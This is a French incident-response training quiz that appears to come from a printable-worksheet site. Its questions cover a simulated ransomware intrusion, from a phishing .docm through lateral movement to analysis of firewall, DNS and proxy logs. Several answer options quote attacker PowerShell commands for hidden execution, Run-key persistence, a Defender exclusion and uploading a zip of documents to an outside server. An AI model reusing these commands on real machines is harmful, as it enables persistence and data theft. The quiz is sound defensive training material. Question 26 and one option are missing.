wayground logo

Free Printable Worksheets

Font size

S
M
L
XL
Worksheets

Présentation_FionaP_I-Tracing

Total questions: 35

Worksheet time: 2hrs 10mins

Name
Class
Date
1.

Le CSIRT a pour mission principale de détecter, analyser et répondre aux incidents de sécurité informatique.

a)

Vrai

b)

Faux

2.

Le CSIRT est uniquement chargé de la communication externe avec la presse en cas de cyberattaque.

a)

Vrai

b)

Faux

3.

Le CSIRT peut être impliqué dans des actions de prévention, comme des campagnes de sensibilisation à  la cybersécurité.

a)

Vrai

b)

Faux

4.

Quelle est la première action recommandée après avoir été informé que Machine1 est infectée ?

a)

Redémarrer Machine1 pour interrompre l'infection

b)

Isoler Machine1 du réseau pour contenir la menace

c)

Mettre à  jour les antivirus sur Machine1

d)

Supprimer les fichiers suspects détectés manuellement

5.

Pourquoi la présence de plusieurs machines non surveillées dans le même VLAN que Machine1 est-elle préoccupante ?

a)

Cela complique la mise à  jour des correctifs de sécurité

b)

Le risque de propagation non détectée est plus élevé

c)

Ces machines peuvent ralentir l'analyse de l'antivirus

d)

Elles empêchent le SOC d'agir sur Machine1

6.

Quel vecteur d’infection est utilisé par le groupe EncryptoLOL pour accéder à Machine1 ?

a)

Téléchargement via un site web de streaming

b)

Pièce jointe malveillante dans un e-mail de phishing

c)

Clé USB infectée laissée sur un parking

d)

Vulnérabilité non corrigée dans le navigateur

7.

Quel rôle joue PowerShell dans l’attaque d’EncryptoLOL ?

a)

Il a été utilisé pour supprimer les sauvegardes

b)

Il a servi à exécuter la charge utile après activation d’une macro

c)

Il a permis la communication avec le C2 en HTTPS

d)

Il a désinstallé les antivirus

8.

Quelle technique a permis au malware de se propager à d'autres machines ?

a)

Remote Desktop Protocol (RDP)

b)

SSH Brute Force

c)

Partages réseau via le protocole SMB

d)

DNS Tunneling

9.

Quel indicateur de compromission (IOC) est utilisé pour détecter la communication avec le serveur de commande ?

a)

Le nom de domaine d’un site de streaming

b)

L’adresse IP 185.45.67[.]89

c)

Une URL interne

d)

L’adresse MAC de Machine1

10.

Quels sont les différents types de notifications reçues par Alice Martin le 23/04/2025 entre 08:15 et 10:50 ?

a)

Mise à jour de compte

b)

Notifications de connexion et alertes de sécurité

c)

Notifications de livraisons et achats

d)

Aucune des réponses ci-dessus

11.

Quel email contient une pièce jointe suspecte (docm) et quel est son sujet ?

a)

"Urgent! Vérification de votre compte bancaire"

b)

"Mise à jour de votre identifiant Apple"

c)

"Confirmation de votre paiement"

d)

"Nouvelle politique de télétravail"

12.

Quel est le nom du fichier suspect téléchargé ?

a)

validation_crédit.docm

b)

FinalReview.docm

c)

Feedback.docm

d)

Report_v2.xlsx

13.

Quelle commande a été utilisée pour extraire le fichier joint dans le dossier C:\Temp ?

a)

"Compress-Archive -Path 'C:\Users\alice.martin\Documents\*' -DestinationPath 'C:\Temp\data.zip'"

b)

"powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command '$payload = [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\alice.martin\Downloads\validation_crédit.docm','C:\Temp');'"

c)

"Get-EventLog -LogName System -Newest 5"

d)

"Test-Connection google.com -Count 2"

14.

Quelle action a été réalisée pour désactiver la sécurité sur la machine d'Alice Martin ?

a)

Désactivation du pare-feu Windows

b)

Désactivation de la surveillance en temps réel, de la protection contre les logiciels malveillants et du scan des scripts dans les préférences de Windows Defender

c)

Suppression des fichiers de log de l'antivirus

d)

Téléchargement et exécution d'un antivirus alternatif

15.

Quelle commande a été utilisée pour garantir que le script malveillant soit exécuté automatiquement au démarrage de la machine ?

a)

"$dlPath = 'C:\Temp\script.ps1'; Invoke-Expression (Get-Content $dlPath -Raw)"

b)

"Add-MpPreference -ExclusionPath 'C:\Users\alice.martin\AppData\Roaming'"

c)

"Start-Process 'C:\Users\alice.martin\AppData\Roaming\update.exe'"

d)

"Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'Updater' -Value 'C:\Temp\script.ps1'"

16.

Quelle commande a été utilisée pour exfiltrer des données depuis la machine d'Alice Martin vers un serveur externe ?

a)

"Get-ChildItem C:\Users\alice.martin\Documents -Recurse | Measure-Object"

b)

"Get-Command Get-Process"

c)

"(New-Object System.Net.WebClient).UploadFile('4W3i2hguUU7u4VXoby6tK22cszwNjV883sxPsjvybVcYYTtJD2b', 'C:\Temp\data.zip')"

d)

"Compress-Archive -Path 'C:\Users\alice.martin\Documents\*' -DestinationPath 'C:\Temp\data.zip'"

17.

Quel fichier malveillant a été téléchargé et quelle commande a été utilisée pour le télécharger ?

a)

"Un fichier nommé update.exe, téléchargé via DownloadFile."

b)

"Un fichier zip contenant des données personnelles, téléchargé avec Compress-Archive."

c)

"Un script Powershell nommé script.ps1, téléchargé via Invoke-Expression."

d)

"Un programme de nettoyage téléchargé depuis un serveur interne."

18.

Après avoir téléchargé update.exe, à quelle heure a-t-il été exécuté sur Machine1 ?

a)

2025-04-23T08:54:13

b)

2025-04-23T08:54:10

c)

2025-04-23T08:54:15

d)

2025-04-23T08:55:10

19.

Quel utilisateur a accédé à la fois aux serveurs \\server1\finance et \\server2\backup dans un laps de temps très court ?

a)

mary.johnson

b)

john.doe

c)

alice.martin

d)

george.white

20.

Quelles actions ont été effectuées par Alice Martin à 08:44:00 ?

a)

Déconnexion du serveur finance

b)

Suppression du fichier update.exe

c)

Copie de fichiers des partages vers son dossier personnel

d)

Ouverture d’un document PDF

21.

À quel moment update.exe est-il apparu sur les serveurs ?

a)

08:43:56

b)

08:44:00

c)

08:54:20

d)

08:55:45

22.

Que fait Alice Martin immédiatement après avoir copié update.exe sur les serveurs ?

a)

Elle accède aux fichiers update.exe sur les deux serveurs

b)

Elle se déconnecte sans action

c)

Elle supprime les fichiers ZIP

d)

Elle exécute un script PowerShell

23.

Parmi les affirmations suivantes, laquelle décrit le mieux l’ensemble de ses actions ?

a)

Alice Martin a tenté de restaurer une sauvegarde

b)

Alice Martin a copié des fichiers à des fins de sauvegarde

c)

Alice Martin a agi en tant qu’administratrice réseau légitime

d)

Alice Martin a exfiltré des données et propagé le ransomware sur les serveurs

24.

Plusieurs IP apparaissent de façon récurrente dans les logs Pare-Feux de la machine 10.1.1.10. Parmi les suivantes, lesquelles méritent une investigation plus poussée (Plusieurs choix possibles) ?
MDP: FW_9835

a)

212.192.246.12

b)

185.129.62.62

c)

13.107.4.50

d)

20.42.75.21

25.

Parmi les trois IPs identifiées précédemment dans les logs DNS, laquelle semble être associée à un domaine non connu ? (MDP: DNS_3872)

a)

212.192.246.12

b)

185.129.62.62

c)

20.42.75.21

d)

Aucune des réponses

27.

Quel est le type de requête HTTP envoyée à l'URL 'https://www.supportcenter-files.com/upload' ?
(MDP: PROXY_4564)

a)

GET

b)

POST

c)

DELETE

d)

PUT

28.

A quelle étape de l'attaque cette action semble correspondre ?

a)

exfiltration

b)

accès initial

c)

téléchargement du ransomware

d)

élévation de privilèges

29.

Quel fichier est téléchargé depuis le domaine supportcenter-files.com ?

b)

report.pdf

c)

update.exe

d)

validation.docm

30.

Quel est le code de statut HTTP retourné lors de la requête GET pour télécharger le fichier 'update.exe' ?

a)

404

b)

200

c)

403

d)

500

31.

Quel est le score de confiance en matière d'abus associés à l'IP 185.129.62.62 sur AbuseIPDB ?

a)

70%

b)

10%

c)

100%

d)

7%

32.

Depuis combien de temps cette IP a-t-elle été signalée ?

a)

Moins de 1 mois

b)

Moins de 6 mois

c)

Plus de 1 an

d)

Plus de 2 ans

33.

Quels sont les ports ouverts sur l'IP 185.129.62.62 selon Shodan ?

a)

9001

b)

123

c)

2200

d)

9030

e)

Tous les ports mentionnés

34.

Quel est le fournisseur d'Internet associé à l'IP selon VirusTotal ?

a)

Google

b)

Amazon

c)

Zencurity

d)

OVH

35.

Quelle information importante peut-on déduire du WHOIS de l’IP 185.129.62.62 ? (Partie "Détails" dans VirusTotal)

a)

L’IP appartient à un fournisseur cloud américain, L’IP est utilisée pour héberger des services de streaming

b)

L’IP appartient à une entreprise danoise qui héberge des serveurs Tor

c)

L’IP est associée à un service de messagerie chiffrée allemand